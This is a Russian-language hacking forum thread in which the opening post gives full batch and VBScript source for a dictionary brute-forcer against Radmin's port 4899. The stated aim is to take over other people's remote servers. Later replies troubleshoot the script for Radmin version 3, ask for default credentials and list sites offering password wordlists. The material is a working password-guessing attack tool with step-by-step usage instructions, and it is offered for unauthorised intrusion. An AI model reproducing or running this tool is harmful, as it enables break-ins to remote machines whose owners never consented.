[{Введение} Салют всем любителям «холявных» дедиков, и просто нашедшим на атакуймой машине открытый 4899 порт из под радмина посвящается. {Теория} Все мы сталкивались с такой ситуацией ,когда насканив радминовский порт ,мы с безумным блеском в глазах вбивая дефолтный пасс , обламывались на говно. А взять себе данный дед, желание так просто и распирает. Что делать??? Все просто пишем свой Брут под данный косяк. Для начала у нас должен быть алгоритм. Для написания Я выбрал язык программирования VBS script. Что же должен делать наш брутфорс. Вот простенький алгоритм (Проще думаю уже некуда) : 1.Это принимать IP-адрес атакуемой машины. 2. Находить словарь, и по нему осуществлять подбор 3. Выводить результат. Ну всё переходим к практике. {Практика (геморрой)}( Все что приведено тут делается в простом блокноте.) Что так просто кажется в теории, не так просто сделать на практике. Для начала сделаем сам брут. Так как програмулину на ВБС учить работать с сетью это мутатень, будем использовать программу уже умеющую делать это, а именно Radmin.exe. Первое что мы сделаем , это создадим бат файл , где укажем какие параметры он должен передать брут скрипту. Исходник батника будет выглядеть так : Start.bat Code: cscript winner13.vbs password.txt (сохраняем это в файл start.bat) Тут видим что через батник запускается winner13.vbs с параметром password.txt Где же сам брутфорс спросите вы ,а вот он: (из за простоты скрипта, комментарий думаю излишний) Code: WScript.Echo " " WScript.Echo " " WScript.Echo " " WScript.Echo " " WScript.Echo " ===================================================" WScript.Echo " = Вводим ip атакуемого =" WScript.Echo " = =" WScript.Echo " = Используется: cscript winner13.vbs =" WScript.Echo " = Подбор по словарю = password.txt =" WScript.Echo " ===================================================" WScript.Echo " " WScript.Echo " note: do not interfere with the process !!!! " WScript.Echo " " WScript.Echo " " Set objShell = CreateObject("Wscript.Shell") ' создаём вбс объект intValue = InputBox("Please Enter Your Target IP:") ' делаем ввод данных по айпишнегу. strCommandLine = intValue Set cmd = CreateObject("WScript.Shell") If WScript.Arguments(0) = "" Then WScript.Echo "usage: cscript vbsFile.vbs <yourtxtfile>" ' юзаем наш password.TXT Else Set fso = CreateObject("Scripting.FileSystemObject") Filename = WScript.Arguments(0) If fso.FileExists(Filename) Then ' цикл подбора Set objTextFile = fso.OpenTextFile(Filename,1) ' открытие словаря WScript.Sleep 2000 Do Until objTextFile.AtEndOfStream line = objTextFile.Readline WScript.Echo "[+] Атакуется " & intValue & "....... " & line ' вывод строки WScript.Sleep 200 set WshShell = WScript.CreateObject("WScript.Shell") ' начало работы с файлом radmin.exe WshShell.Run "radmin.exe /connect:" & intValue & ":4899 /telnet" 'запуск WScript.Sleep 1000 'задержка в секунду WshShell.AppActivate "Enter password for <Entry name>" 'вывод положительного результат если таковой есть WshShell.SendKeys line WScript.Sleep 1000 'задержка в секунду WshShell.SendKeys "{ENTER}" WScript.Sleep 1000 WshShell.SendKeys "{ENTER}" loop objTextFile.Close 'закрытие словаря Else WScript.Echo Filename & "не найденно" ' вывод отрицательного результата End If End If (всё это сохраняем как winner13.vbs) Ну вот 2 файла у нас готово , это start.bat и winner13.vbs. Теперь нам лишь остается закинуть в папку саму программу radmin.exe, и словарь для атаки password.txt Итак. Последовательность действий: 1.Выделяем какую нить пустую папочку 2. Создаем там батник start.bat 3.Создаем ВБСскрипт winner13.vbs 4. Кидаем туда же radmin.exe 5. Создаем словарь для атаки password.txt А дальше всё просто =).Брутим дедик , и наслаждаемся результатом. {Вывод} Ну тут как обычно , автор не несёт ответственности за ваши действия , и т.д и т.п. Всё что вы сделаете в этом виноваты вы сами, эта статья лишь для ознакомления. Всем всего доброго. Поверид бай winner13 (с) winner13 P.S. для тех у кого нечего не работает, чуть позже выложу уже готовое. С наилучшими пожеланиями от меня.
Вообщем, вопрос следующего характера: А почему при бруте слова со словаря password.txt вставляются в поле username, а не в password? P.S. Еще вопрос немного оффтопик: Какой логин:пасс у радмина по-умолчанию?
скорей всего ты что то не так собрал, либо несовместимый радмин ,нет тех фитч,что на той версии которую использовал Я .Сейчас выложу готовое.
Скачал твою рабочую версию, сейчас пишет Incorrect version of server Какова версия твоего radmin'a? Судя по всему вторая, значит дедики с версией 3 радмин сервера брутить не получится?
Просто кинь ехе-шник радмина ,3 версии в папку и всё будет гуд.просто Когда писал это, ещё 2радмин новой версией был.Всё норм работает =) А словари через гугл , там линков много.Сюда кину что нормальное найду.
Вот набор линков , где можно скачать словари для брутфорса. С http://www.cyberinfo.ru/3/1596_1.htm : Code: www.passwords.ru/dic.htm ftp.openwall.com/pub/wordlists/ ftp.cerias.purdue.edu/pub/dict/ ftp.ox.ac.uk/pub/wordlists/ ftp.funet.fi/pub/unix/security/dictionaries/ www.outpost9.com/files/WordLists.html www.phreak.com/html/wordlists.shtml coast.cs.purdue.edu/pub/dict/wordlists/
Честно , хз чё там у тебя, тестировал последнюю версию радмина , все прошло на ура и даже ни пикнуло.Думаю ты что то наверно не так юзаешь, так как все фитчи радмина из вызовов программы из командной строки стандартны во всех версиях.
Разница Радмин сервера версии 2 и версии 3 в том, что 2-я просит только пароль, а 3-я просит и логин и пароль, так вот, оно то с третьей версией работает и не пикает, только вот вместо поля пароля оно вводит в поле логина. Сам скрипт писался для 2-й версии как я понял, а значит про логин там и не упоминалось. В клиенте то ничего в смысле вызова из командной строки не поменялось, но вот реакция клиента на разные версии радмина тоже разная, вообщем потести на 2-й версии сервера и на 3-й и сравни результат. Просто надо брать какое-либо значение по умолчанию и вбивать его в логин, а пароли из списка вбивать в поле паролей, для начала будет самый гуд.
на сегодня для меня актуальная тема все это ништяк но гуды он никуды не сохраняет просто открывает телнет и гадай на какой пасс он сбрутил в чем беда?